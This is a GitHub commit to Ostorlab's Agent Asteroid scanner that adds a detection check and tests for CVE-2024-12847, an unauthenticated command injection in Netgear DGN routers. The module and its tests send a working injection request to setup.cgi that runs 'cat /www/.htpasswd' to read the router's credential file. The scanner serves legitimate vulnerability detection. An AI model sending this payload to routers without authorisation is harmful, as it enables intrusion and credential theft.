Skip to content

Commit

Permalink
Merge pull request #168 from Ostorlab/feature/Add-Detection-for-CVE-2…
Browse files Browse the repository at this point in the history
…024-12847

Add detection for CVE-2024-12847
  • Loading branch information
nmasdoufi-ol authored Jan 13, 2025
2 parents 5cdb421 + 1f3ae17 commit b2095f2
Show file tree
Hide file tree
Showing 9 changed files with 224 additions and 51 deletions.
2 changes: 1 addition & 1 deletion agent/exploits/cve_2019_12989.py
Original file line number Diff line number Diff line change
Expand Up @@ -108,7 +108,7 @@ def _create_vulnerability(
targeted_by_nation_state=True,
)
technical_detail = (
f"{target.origin} is vulnerable to " f"CVE-2019-12989 and CVE-2019-12991"
f"{target.origin} is vulnerable to CVE-2019-12989 and CVE-2019-12991"
)
vulnerability = definitions.Vulnerability(
entry=entry,
Expand Down
74 changes: 74 additions & 0 deletions agent/exploits/cve_2024_12847.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,74 @@
"""Agent Asteroid implementation for CVE-2024-12847"""

import datetime
import logging

from requests import exceptions as requests_exceptions

from agent import definitions
from agent import exploits_registry
from agent.exploits import webexploit

VULNERABILITY_TITLE = "Netgear DGN1000/DGN2000 Unauthenticated RCE"
VULNERABILITY_REFERENCE = "CVE-2024-12847"
VULNERABILITY_DESCRIPTION = (
"Netgear DGN1000 and DGN2000 routers contain an unauthenticated remote code execution "
"vulnerability in the setup.cgi script. The syscmd function allows execution of "
"arbitrary commands."
)
RISK_RATING = "CRITICAL"
DEFAULT_TIMEOUT = datetime.timedelta(seconds=90)

COMMAND = "cat+/www/.htpasswd"
ENDPOINT = "/setup.cgi"
KEYWORD = "admin:"


@exploits_registry.register
class NetgearDGNCommandInjectionExploit(webexploit.WebExploit):
"""
CVE-2024-12847: Netgear DGN1000/DGN2000 Unauthenticated RCE
"""

metadata = definitions.VulnerabilityMetadata(
title=VULNERABILITY_TITLE,
description=VULNERABILITY_DESCRIPTION,
reference=VULNERABILITY_REFERENCE,
risk_rating=RISK_RATING,
)

def accept(self, target: definitions.Target) -> bool:
try:
resp = self.session.get(
target.origin + ENDPOINT, timeout=DEFAULT_TIMEOUT.seconds
)
except requests_exceptions.RequestException:
return False
if resp.status_code == 200:
return True
return False

def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
"""Rule to detect command injection vulnerability on a target."""
vulnerabilities: list[definitions.Vulnerability] = []

try:
resp = self.session.get(
f"{target.origin}{ENDPOINT}",
params={
"next_file": "netgear.cfg",
"todo": "syscmd",
"cmd": COMMAND,
"curpath": "/",
"currentsetting.htm": "1",
},
timeout=DEFAULT_TIMEOUT.seconds,
)

if resp.status_code == 200 and KEYWORD in resp.text:
vulnerabilities.append(self._create_vulnerability(target))

except requests_exceptions.RequestException as e:
logging.error("Command injection detection failed: %s", e)

return vulnerabilities
3 changes: 1 addition & 2 deletions agent/exploits/cve_2024_8522.py
Original file line number Diff line number Diff line change
Expand Up @@ -59,8 +59,7 @@ def _create_vulnerability(target: definitions.Target) -> definitions.Vulnerabili
targeted_by_nation_state=False,
)
technical_detail = (
f"{target} is vulnerable to {VULNERABILITY_REFERENCE}, "
f"{VULNERABILITY_TITLE}"
f"{target} is vulnerable to {VULNERABILITY_REFERENCE}, {VULNERABILITY_TITLE}"
)
vulnerability = definitions.Vulnerability(
entry=entry,
Expand Down
100 changes: 100 additions & 0 deletions tests/exploits/cve_2024_12847_test.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,100 @@
"""Unit tests for CVE-2024-12847"""

import requests_mock as req_mock
from requests import exceptions as requests_exceptions

from agent import definitions
from agent.exploits import cve_2024_12847


def testNetgearDGNCommandInjection_whenVulnerable_reportFinding(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is vulnerable to command injection."""
requests_mock.get(
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
text="admin:$1$12345678$ABCDEFGHIJKLMNOPQRSTUVWX",
status_code=200,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

accept = exploit_instance.accept(target)
vulnerabilities = exploit_instance.check(target)

assert accept is True
assert len(vulnerabilities) > 0
vulnerability = vulnerabilities[0]
assert vulnerability.entry.title == "Netgear DGN1000/DGN2000 Unauthenticated RCE"
assert vulnerability.entry.risk_rating == "CRITICAL"


def testNetgearDGNCommandInjection_whenNotNetgear_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when target is not a Netgear device."""
requests_mock.get(
"http://localhost:80/setup.cgi",
status_code=200,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat%2B%2Fwww%2F.htpasswd&curpath=%2F&currentsetting.htm=1",
status_code=401,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)
accept = exploit_instance.accept(target)

assert accept is True
assert len(vulnerabilities) == 0


def testNetgearDGNCommandInjection_whenCommandFails_reportNothing(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: when command injection fails."""
requests_mock.get(
"http://localhost:80/setup.cgi",
headers={"WWW-Authenticate": "DGN1000"},
status_code=401,
)

requests_mock.get(
"http://localhost:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1",
text="",
status_code=200,
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0


def testNetgearDGNCommandInjection_requestException_handlingErrorLogged(
requests_mock: req_mock.mocker.Mocker,
) -> None:
"""Test case: handle RequestException in command injection detection."""
requests_mock.get(
"http://localhost:80/setup.cgi",
exc=requests_exceptions.RequestException("Simulated connection error"),
)

exploit_instance = cve_2024_12847.NetgearDGNCommandInjectionExploit()
target = definitions.Target("http", "localhost", 80)

vulnerabilities = exploit_instance.check(target)

assert len(vulnerabilities) == 0
18 changes: 9 additions & 9 deletions tests/exploits/cve_2024_6387_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,9 +20,9 @@ def testAcceptExploit_whenVulnerableBanner_shouldReturnTrue(

accept = exploit_instance.accept(target)

assert (
accept is True
), f"Expected vulnerability detection for IP address {target.origin}, but accept returned False"
assert accept is True, (
f"Expected vulnerability detection for IP address {target.origin}, but accept returned False"
)


@patch("agent.exploits.cve_2024_6387.get_ssh_banner")
Expand Down Expand Up @@ -61,9 +61,9 @@ def testCheckExploit_whenVulnerable_shouldReportFinding(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) > 0
), f"Expected vulnerabilities for IP address {target.origin}, but found none"
assert len(vulnerabilities) > 0, (
f"Expected vulnerabilities for IP address {target.origin}, but found none"
)


@patch("agent.exploits.cve_2024_6387.get_ssh_banner")
Expand All @@ -81,6 +81,6 @@ def testCheckExploit_whenSafe_shouldReportNothing(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) == 0
), f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
assert len(vulnerabilities) == 0, (
f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
)
48 changes: 24 additions & 24 deletions tests/exploits/cve_2024_6633_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,9 +58,9 @@ def testIsPortOpen_whenPortIsOpen_reportTrue(mock_socket: mock.MagicMock) -> Non

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is True
), f"Expected True, but got {result}. The port should be reported as open."
assert result is True, (
f"Expected True, but got {result}. The port should be reported as open."
)


@mock.patch("agent.exploits.cve_2024_6633.socket.socket")
Expand All @@ -71,9 +71,9 @@ def testIsPortOpen_whenPortIsClosed_reportFalse(mock_socket: mock.MagicMock) ->

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is False
), f"Expected False, but got {result}. The port should be reported as closed."
assert result is False, (
f"Expected False, but got {result}. The port should be reported as closed."
)


@mock.patch("agent.exploits.cve_2024_6633.jaydebeapi.connect")
Expand Down Expand Up @@ -106,9 +106,9 @@ def testAttemptDbConnection_whenConnectionFails_reportFalse(
"Database error occurred while connecting: %s", mock.ANY
)
error_message = mock_logger.error.call_args[0][1]
assert "Test DB error" in str(
error_message
), "Error message should contain the specific database error"
assert "Test DB error" in str(error_message), (
"Error message should contain the specific database error"
)


@mock.patch("agent.exploits.cve_2024_6633.jaydebeapi.connect")
Expand All @@ -129,9 +129,9 @@ def testAttemptDbConnection_whenJavaExceptionOccurs_reportFalse(
"Database error occurred while connecting: %s", mock.ANY
)
error_message = mock_logger.error.call_args[0][1]
assert "java.sql.SQLTransientConnectionException" in str(
error_message
), "Error message should contain the specific Java exception"
assert "java.sql.SQLTransientConnectionException" in str(error_message), (
"Error message should contain the specific Java exception"
)


@mock.patch("agent.exploits.cve_2024_6633.socket.socket")
Expand All @@ -144,9 +144,9 @@ def testIsPortOpen_whenSocketErrorOccurs_reportFalse(

result = cve_2024_6633._is_port_open("192.168.1.1", 4406)

assert (
result is False
), f"Expected False, but got {result}. The function should return False when a socket.error occurs."
assert result is False, (
f"Expected False, but got {result}. The function should return False when a socket.error occurs."
)


def testDetectVulnerability_whenPortOpenAndVulnerable_reportTrue() -> None:
Expand All @@ -159,9 +159,9 @@ def testDetectVulnerability_whenPortOpenAndVulnerable_reportTrue() -> None:
):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is True
), f"Expected True, but got {result}. The function should return True when the target is vulnerable."
assert result is True, (
f"Expected True, but got {result}. The function should return True when the target is vulnerable."
)


def testDetectVulnerability_whenPortOpenButNotVulnerable_reportFalse() -> None:
Expand All @@ -174,16 +174,16 @@ def testDetectVulnerability_whenPortOpenButNotVulnerable_reportFalse() -> None:
):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is False
), f"Expected False, but got {result}. The function should return False when the target is not vulnerable."
assert result is False, (
f"Expected False, but got {result}. The function should return False when the target is not vulnerable."
)


def testDetectVulnerability_whenPortClosed_reportFalse() -> None:
"""Test _detect_vulnerability when the port is closed."""
with mock.patch("agent.exploits.cve_2024_6633._is_port_open", return_value=False):
result = cve_2024_6633._detect_vulnerability("192.168.1.1")

assert (
result is False
), f"Expected False, but got {result}. The function should return False when the port is closed."
assert result is False, (
f"Expected False, but got {result}. The function should return False when the port is closed."
)
12 changes: 6 additions & 6 deletions tests/exploits/cve_2024_6745_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -25,9 +25,9 @@ def testCVE20246745_whenVulnerable_reportFinding(
exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
target = definitions.Target("http", "example.com", 80)

assert (
exploit_instance.accept(target) is True
), "The target should be reported as vulnerable."
assert exploit_instance.accept(target) is True, (
"The target should be reported as vulnerable."
)

vulnerabilities = exploit_instance.check(target)
vulnerability = vulnerabilities[0]
Expand Down Expand Up @@ -57,9 +57,9 @@ def testCVE20246745_whenSafe_reportNothing(requests_mock: req_mock.Mocker) -> No
exploit_instance = cve_2024_6745.SimpleTicketBookingSQLInjectionExploit()
target = definitions.Target("http", "example.com", 80)

assert (
exploit_instance.accept(target) is True
), "The target should be reported as safe."
assert exploit_instance.accept(target) is True, (
"The target should be reported as safe."
)

vulnerabilities = exploit_instance.check(target)

Expand Down
12 changes: 6 additions & 6 deletions tests/exploits/cve_2024_7589_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -59,9 +59,9 @@ def testCheckExploit_whenVulnerable_shouldReportFinding(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) > 0
), f"Expected vulnerabilities for IP address {target.origin}, but found none"
assert len(vulnerabilities) > 0, (
f"Expected vulnerabilities for IP address {target.origin}, but found none"
)


@patch("agent.exploits.cve_2024_7589.get_ssh_banner")
Expand All @@ -79,6 +79,6 @@ def testCheckExploit_whenSafe_shouldReportNothing(

vulnerabilities = exploit_instance.check(target)

assert (
len(vulnerabilities) == 0
), f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
assert len(vulnerabilities) == 0, (
f"Expected no vulnerabilities for IP address {target.origin}, but found {len(vulnerabilities)}"
)
6 changes: 3 additions & 3 deletions tests/exploits_registry_test.py
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,6 @@ def testExploitsRegistry_allExploits_mustBeRegisteredOnce() -> None:

cnt = collections.Counter(exploits_registry.ExploitsRegistry().values())

assert all(
v == 1 for v in cnt.values()
), f"Found {[(k, v) for k, v in cnt.items() if v > 1]}"
assert all(v == 1 for v in cnt.values()), (
f"Found {[(k, v) for k, v in cnt.items() if v > 1]}"
)

0 comments on commit b2095f2

Please sign in to comment.